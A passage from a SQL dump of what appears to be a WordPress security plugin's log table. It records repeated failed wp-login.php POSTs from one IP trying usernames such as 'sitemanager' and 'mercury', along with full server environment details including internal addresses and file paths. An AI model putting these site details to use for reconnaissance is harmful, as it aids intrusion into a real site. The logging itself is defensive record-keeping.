04:24:38'),(94818,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52294\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138614.2341499;s:12:\"REQUEST_TIME\";i:1746138614;}}','196.251.112.104',1,'2025-05-02 04:00:16','2025-05-03 04:24:38'),(94819,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"124\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52288\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"124\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138614.2135401;s:12:\"REQUEST_TIME\";i:1746138614;}}','196.251.112.104',1,'2025-05-02 04:00:16','2025-05-03 04:24:38'),(94820,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52110\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138814.1156399;s:12:\"REQUEST_TIME\";i:1746138814;}}','196.251.112.104',1,'2025-05-02 04:03:35','2025-05-03 04:24:38'),(94821,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52112\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138814.1505389;s:12:\"REQUEST_TIME\";i:1746138814;}}','196.251.112.104',1,'2025-05-02 04:03:35','2025-05-03 04:24:38'),(94822,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52113\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138814.140655;s:12:\"REQUEST_TIME\";i:1746138814;}}','196.251.112.104',1,'2025-05-02 04:03:35','2025-05-03 04:24:38'),(94823,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52111\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138814.141264;s:12:\"REQUEST_TIME\";i:1746138814;}}','196.251.112.104',1,'2025-05-02 04:03:35','2025-05-03 04:24:38'),(94824,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52108\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138814.103781;s:12:\"REQUEST_TIME\";i:1746138814;}}','196.251.112.104',1,'2025-05-02 04:03:36','2025-05-03 04:24:38'),(94825,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51930\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139004.8337009;s:12:\"REQUEST_TIME\";i:1746139004;}}','196.251.112.104',1,'2025-05-02 04:06:46','2025-05-03 04:24:38'),(94826,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51932\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139004.8460989;s:12:\"REQUEST_TIME\";i:1746139004;}}','196.251.112.104',1,'2025-05-02 04:06:46','2025-05-03 04:24:38'),(94827,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51934\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139004.8669069;s:12:\"REQUEST_TIME\";i:1746139004;}}','196.251.112.104',1,'2025-05-02 04:06:46','2025-05-03 04:24:38'),(94828,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51935\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139004.8661671;s:12:\"REQUEST_TIME\";i:1746139004;}}','196.251.112.104',1,'2025-05-02 04:06:46','2025-05-03 04:24:38'),(94829,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51926\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139004.8310969;s:12:\"REQUEST_TIME\";i:1746139004;}}','196.251.112.104',1,'2025-05-02 04:06:46','2025-05-03 